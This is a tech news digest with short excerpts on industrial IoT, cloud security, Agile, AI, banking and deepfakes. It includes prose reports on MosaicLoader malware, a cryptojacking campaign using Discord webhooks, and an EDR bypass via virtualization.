Although predictive maintenance is often held up as a prime example of the value that IoT and advanced analytics can generate, in fact, any predictions in the real world are imperfect. Our research shows that some organizations, even with highly qualified AA teams, are unlikely to realize the desired impact. The AA algorithm employed may fail to predict a breakdown, giving a false negative, and in other cases can predict an event that would not have happened, giving a false positive. Although much effort is often put into minimizing false negatives, it is often the false positives that make predictive maintenance less viable. Make no mistake, predictive maintenance can be very valuable. In situations with very high cost or safety issues associated with a breakdown, such as the midair failure of a jet turbine, operators need the closest estimate possible of when a breakdown might occur. In addition, in cases in which failures are highly predictable and well-understood—and the chance of a false positive is therefore minimal or very low-cost—predictive maintenance is well worth the expense.


Politicization and stigmatization won’t solve cyber security concerns: Chinese Mission to the EU and embassies

Slamming the EU and NATO's allegations, spokesperson of the Chinese Mission to the EU said that the statements were not based on facts, but speculation and groundless accusations. He added that China has always been a firm defender of cyber security and has cracked down on cyber attacks launched within China or using Chinese cyber facilities. "For years, certain countries in the West have abused their technological advantages for massive and indiscriminate eavesdropping across the world, even on its close allies. At the same time, they have boasted themselves as the guardians of cyber security. They push around their allies to form small circles and repeatedly smear and attack other countries on cyber security issues," the Mission said. Such practices fully expose the West's hypocrisy, it added. The Mission said it will follow closely NATO's attempts to break its geographical constraints under the guise of cyber security to make false accusations against China. Over the years, China has been a major victim of cyber attacks. 


Old Agile vs New Agile

Agile 2 is new in that it aggregates the ideas of these new thinkers, and integrates these ideas into a cohesive system of thought, while adding missing pieces. Agile 2 interprets these many writings and translates them into a common and holistically integrated shared narrative. But what is that narrative? Agile 2 is complex because humans are complex. It is not a set of bumper sticker maxims asserted without supporting explanation and rationale. Agile 2 is nuanced and broad, and is published with the thought that went into it. But I will summarize it, to give you a sense. Agile 2 is defined by its Values and Principles. Most of those principles could be summarized as described here. Basically, Agile 2 says that extremes don’t usually work well, and that judgment is called for when applying any practice. It also emphasizes the critical importance of having the right kinds of leadership for each situation. Note that “kinds of leadership” is plural. Agile 2 favors emergent leadership and autonomy, but it views those as aspirations rather than assumptions, and includes the theory that senior leaders need to be intentional about the kinds of leadership needed within their organization ...


Google advances ‘invisible’ cloud security with intrusion detection, analytics and more

Google’s new Cloud IDS offering epitomizes that vision. Announced in preview today, Cloud IDS is said to be a cloud-native, managed intrusion detection system that enterprises can deploy in just a few clicks in order to protect themselves against malware, spyware, command-and-control attacks and other network-based threats, Potti said. Google worked closely with Palo Alto Networks Inc. to develop Cloud IDS. The system incorporates that company’s advanced threat detection technologies to detect malicious network activity with very low false positives. It’s essentially a managed version of Palo Alto’s threat detection services, available in Google Cloud, where scaling, availability and updates are all automated. Google Cloud IDS stands out for its flexibility, the company says. It can easily be integrated with third-party security information and event management and security orchestration, automation and response platforms, enabling users to both investigate and automatically respond to any alerts, Potti said. 


Advanced Technology Outcomes: Humans Vs. Machine Or Human With Machine?

There is no doubt that we humans have always benefited from machines and also that we have the power to turn them off when required. But now the situation has turned around. The increasing issue is the vital role played by machines both as a single unit and collectively as infrastructures. This means humans no longer have the option to shut the machines off. In the health sector as well machines are evolving at a faster rate. Surgery is becoming robotized and medical diagnostics has become dependent on machines. Even there are automated machines that are manufacturing drugs. Therefore, pulling the plug off will result in terrible consequences for thousands of people worldwide. Besides all this, we are making use of machines as an extension of ourselves and applying them as stronger, faster, and cheaper hands. And, because of this, we still win over the machines but it is on us to make accurate decisions for the upcoming future. We are continuously getting engaged with machines. We use smartphones to show routes, to reach a destination, to look for recipes, even we use smartphones to check our health and the list is increasing rapidly.


Bringing Your Factory to the Edge in 2021

Is your factory living in the dark ages? Are you constantly checking manual reports to see your production scores? Do you wish that you could check your factory health on your smart device from anywhere in the world? If so, you could benefit from taking your factory to the edge. ... Reading information directly from our fieldbus-connected devices works great for a retrofit if you are an end user and not a programmable logic controller (PLC) programmer, or if you do not have access to the controller in the system because the integrator did not provide source codes. You can use a number of protocol converters and commercially available edge connection devices to take your machine-level data to an edge platform with some basic education online. For a large number of users, this option will get their factory “talking” to them for minimal human or equipment capital. It will require only protocol conversion and an edge connector (which we will discuss in a moment) and the cloud setup of choice, which can be outsourced.


MosaicLoader Malware Delivers Facebook Stealers, RATs

Once installed on a machine, the malware creates a complex chain of processes, according to Bitdefender. Its hallmark, researchers said, is a unique obfuscation technique that shuffles small code chunks around resulting in an intricate, mosaic-like structure – hence the name. The first stage of the execution flow is the installation of a dropper, which mimics legitimate software: Most of the first-stage droppers that researchers analyzed have icons and “version information” that mirror those used for legitimate applications. In some cases, the dropper pretends to be a NVIDIA process, for instance. The dropper makes contact with the C2 (the URL of the C2 is hardcoded as a string), then downloads a .ZIP file into the %TEMP% folder that contains two files required for the second stage: appsetup.exe, and prun.exe. These are extracted to an innocuous-sounding “PublicGaming,” folder in the C: directory, while the dropper also launches several instances of Powershell to add exclusions from Windows Defender for the folder and the specific file names.


The biggest remote communication challenges within organisations

Zooming back out to an organisational level, recent events have pushed leadership teams to fully embrace digital transformation. For many organisations, making remote work plausible meant pulling together capabilities from a range of technology providers into something of a patchwork of solutions, that didn’t necessarily behave well together but was necessary given the organisational shock felt initially. Recognising that remote working is going to be a significant and constant part of our working landscape, it is now time to think about how to make this tech stack work more effectively. In many cases, this will involve consolidation, ideally onto a single CRM platform, where the sharing of customer and prospect data between marketing, sales and customer service teams is seamless, and where the platform supports growth, instead of creating friction points. ... The effects of COVID-19 disrupted the working landscape profoundly last year, meaning that UK organisations have had to rethink their working strategies. It is vital that business leaders constantly keep in touch with their employees and support them when these changes are taking place. 


Image encryption technique could keep photos safe on popular cloud photo services

Now researchers have created a way for mobile users to enjoy popular cloud photo services while protecting their photos. The system, dubbed Easy Secure Photos (ESP), encrypts photos uploaded to cloud services so that attackers – or the cloud services themselves – cannot decipher them. At the same time, users can visually browse and display these images as if they weren’t encrypted. “Even if your account is hacked, attackers can’t get your photos because they are encrypted,” said Jason Nieh, professor of computer science and co-director of the Software Systems Laboratory. ESP employs an image encryption algorithm whose resulting files can be compressed and still get recognized as images, albeit ones that look like black and white static to anyone except authorized users. In addition, ESP works for both lossy and lossless image formats such as JPEG and PNG, and is efficient enough for use on mobile devices. Encrypting each image results in three black-and-white files, each one encoding details about the original image’s red, green, or blue data.



Quote for the day:

"Leaders can choose to grow and change, but generally the most powerful predictor of future performance is past behavior. Evaluate them realistically." -- Lee Ellis

Daily Tech Digest - July 20, 2021

3 Ways To Make Conversational AI Work For Your Organization

AI systems possess features unlike any mechanisms we use in human-human conversation. Consequently, you can use them in powerful ways to create conversations and experiences that go beyond what’s possible with people alone. Unlike humans, AI can be available around the clock -- whether to answer a question in the middle of the night or to support an asynchronous conversation that stretches over many days. In addition, machines have an absence of emotion and moral judgment that provides a distinct advantage in some situations. When the subject of a conversation is sensitive, interactions with AI can afford a degree of anonymity that some customers welcome. And when it comes to detecting patterns, AI excels at detecting fraud or breaches of regulatory requirements. AI is vigilant about events about to happen and can proactively engage in anticipation, thereby creating superior experience. And finally, AI is moving to a point where it can literally read your mind. ...  Another point of tension is the potential for manipulation. Persuasive computing can change people’s attitudes or behaviors, while practices like hyper nudging use data to influence people to certain decisions.


Making transformation stick

Leaders must model the behaviors that will be required to sustain change. This can be done with literal acts and symbolic acts that communicate to rank-and-file employees the leaders’ commitment to the transformation. A study by the National Institute for Health Research in the UK highlights the importance of role modeling. The institute reviewed transformation programs in clinical settings and found that out of a variety of factors affecting the longevity of the transformation, senior and clinical leader role modeling was the highest predictor of sustainable change. The study defined role modeling as leaders being seen promoting and investing in the change. The transformation experience of one of our clients bears out this finding. The company recently adopted customer relationship management software that features a tool for gathering insights from client meetings. But using the tool requires the company’s client-facing employees to write up meeting notes, something many find tedious. So, the CEO of the business regularly uses the tool and sends notifications of his written reports to his executive team and their direct reports. This is a powerful example of role modeling.


How smarter data analysis can transform financial planning

Reliance on legacy spreadsheets is inefficient and causes a tremendous amount of overhead and friction for analysts – the opposite of what you want in a process that should be essential for every business. Many of the solutions to these problems involve moving away from Excel entirely, which also isn’t practical in many cases. Smaller businesses, in particular, may not have the time or manpower to migrate their data and the deep logic they’ve built into their Excel sheets to a new platform. “While the rest of the business world moves to powerful, cloud-based SaaS solutions driven by AI and automation, finance departments remain entrenched in Excel,” says Gurfinkel. “While it’s a powerful tool, it lacks modern features that could help drive better forecasting. The ideal solution is one that builds on Excel to leverage its strengths while minimising its weaknesses, rather than trying (and failing) to replace it.” “Automation” has nearly reached buzzword status at this point, but that doesn’t mean the advantages it offers aren’t real. Automation has the potential to transform nearly every facet of work – including financial planning.


Banking is broken. This small FinTech startup plans to fix it

The sheer breadth of banking services Modularbank covers is one of the company's key strengths, says Vene, who points out that competitors have often had to partner with third-party firms to provide the same services. She also believes that the decades of technology and banking experience under Modularbank's belt mean it can tackle complex use cases and customer demands more comfortably than some of its competitors. "To build highly configurable modules, you have to know the product side of finance well. It's not enough to have great technology and great engineers in your team if you don't know what the customer needs to configure in your products," says Vene. Security is another area where experience plays a critical role, and arguably nowhere is this more important than in finance. "We have been working in this field for so many years with highly regulated organizations, so it was normal for us to focus on liability and security from day one," says Vene. For instance, GDPR compliance has been designed into Modularbank's products from the beginning, she says. 


How We Tracked a Threat Group Running an Active Cryptojacking Campaign

After the attackers find and enter into a Linux device with inadequate SSH credentials, they deploy and execute the loader. In the current campaign, they use .93joshua, but they have a couple of others at their disposal; .purrple and .black. All of the loaders are obfuscated via shc. The loader gathers system information and relays it to the attacker using an HTTP POST to a Discord webhook. By using Discord, the threat actors circumvent the need to host their own command-and-control server, as webhooks are means to post data on Discord channel programmatically. The gathered data can also be conveniently viewed on a channel. Discord is increasingly popular among threat actors because of this functionality, as it involuntarily provides support for malware distribution (use of its CDN), command-and-control (webhooks) or creating communities centered around buying and selling malware source code and services (e.g. DDoS). The information gathered at this step lets the threat actor witness the effectiveness of their tools in infecting machines. The list of victims may also be collected to carry out potential post-exploitation steps.


New AI-Based Augmented Innovation Tool Promises to Transform Engineer Problem Solving

What will often happen is that as you work through both the “Functional Concepts” and “Inventive Principles” lists you begin to realize that you’ve omitted elements to your description, or that your description should go in a slightly different direction based on the results. While this represents a slightly iterative process, each iteration is just as fast as the first. In fact, it's faster because you no longer need to spend 10 minutes writing down your changes. All along the process, there's a workbook, similar to an electronic lab notebook, for you to jot down your ideas. As you jot down your ideas based on the recommendations from the AI, it will offer you the ability to run a concept evaluation, telling you whether the concept is “marginally acceptable” or “good”, for example. You can use this concept evaluation tool to understand whether you have written your problem and solution in a way that it's unique or novel, or whether you should consider going back to the drawing board to keep iterating on it.


Unconventional Superconductor May Unlock New Ways To Build Quantum Computers

Scientists on the hunt for an unconventional kind of superconductor have produced the most compelling evidence to date that they’ve found one. In a pair of papers, researchers at the University of Maryland’s (UMD) Quantum Materials Center (QMC) and colleagues have shown that uranium ditelluride (or UTe2 for short) displays many of the hallmarks of a topological superconductor — a material that may unlock new ways to build quantum computers and other futuristic devices. “Nature can be wicked,” says Johnpierre Paglione, a professor of physics at UMD, the director of QMC and senior author on one of the papers. “There could be other reasons we’re seeing all this wacky stuff, but honestly, in my career, I’ve never seen anything like it.” All superconductors carry electrical currents without any resistance. It’s kind of their thing. The wiring behind your walls can’t rival this feat, which is one of many reasons that large coils of superconducting wires and not normal copper wires have been used in MRI machines and other scientific equipment for decades.


Combating deepfakes: How we can future-proof our biometric identities

Deepfakes refer to manipulated videos or other digital representations produced by sophisticated artificial intelligence (AI), which yield fabricated images and sounds that appear to be real. While video deepfakes are arguably the most common, audio deepfakes are also growing in popularity. ... Firstly, we must think about how biometric authentication works. Take voice biometrics as an example: a good fake voice (even just a good impersonator) can be enough to fool a human. However, voice biometric software is much better at identifying differences that the human ear either doesn’t discern or chooses to ignore, which means that voice biometric ID can help prevent fraud if identity is checked against the voice. Even so-called deep fakes create a poor copy of someone’s voice when analyzed at the digital level; they make quite convincing cameos, especially when combined with video, but again these are poor imitations at a digital level. Outside of this, the ability for deepfakes to bypass biometrics-based solutions will ultimately be dependent on the type of liveness detection that is integrated into the solution. 


Is EDR The Silver Bullet For Malware?

Absolute security isn’t possible, as we all know — our control framework is only as strong as our weakest link. In recent years, we’ve seen great strides in innovation surrounding virtualization tools. This new technology, while useful to organizations and users in general, has also given hackers more power to bypass traditional defenses. To prove this, I carried out a small exercise — I aimed to avoid an EDR solution using a virtualization tool. Virtualization technology has opened up many doors for businesses hoping to scale up, but security controls haven’t scaled fast enough to secure these virtualized environments. As such, we’re currently only focused on deploying EDR solutions on physical endpoints because many people assume that anything running on a physical host will be protected from malicious activities. When it comes to virtualization, these tools create an opaque layer on which they manage an environment. Because of this, any EDR solution running on the physical host won’t have visibility on the files and services running on that virtualized image. I used this concept to bypass an EDR solution running on a physical host to simulate an attack on the network.


Moving into "Modern Test Leadership"

Test leaders can ignite passion in testers by finding ways to engage them. Start a community of practice, share blogs, videos, podcasts or get external speakers to come and share their wisdom with the team. You may find from trying some of these, that some of the testers may start wanting to try new ways of testing, or start learning new skills. The next step would be to nurture that passion, point them in the right direction for their career and let them run with it. ... The role of a test leader needs to change; gone are the days of a test manager being the sole point of contact from a quality perspective and being responsible for handing out testing tasks to a team. With the world of agile/DevOps becoming a lot more prominent, the role needs to evolve to being more a test coach, advocating for good testing practices, helping to evolve the culture, raising awareness of what the testers can do and what good quality is. They need to be a servant leader and support their team to fulfil their potential. Being a test leader in the current world is a challenge, but you really can reap what you sow. 



Quote for the day:

"Leadership should be born out of the understanding of the needs of those who would be affected by it. " -- Marian Anderson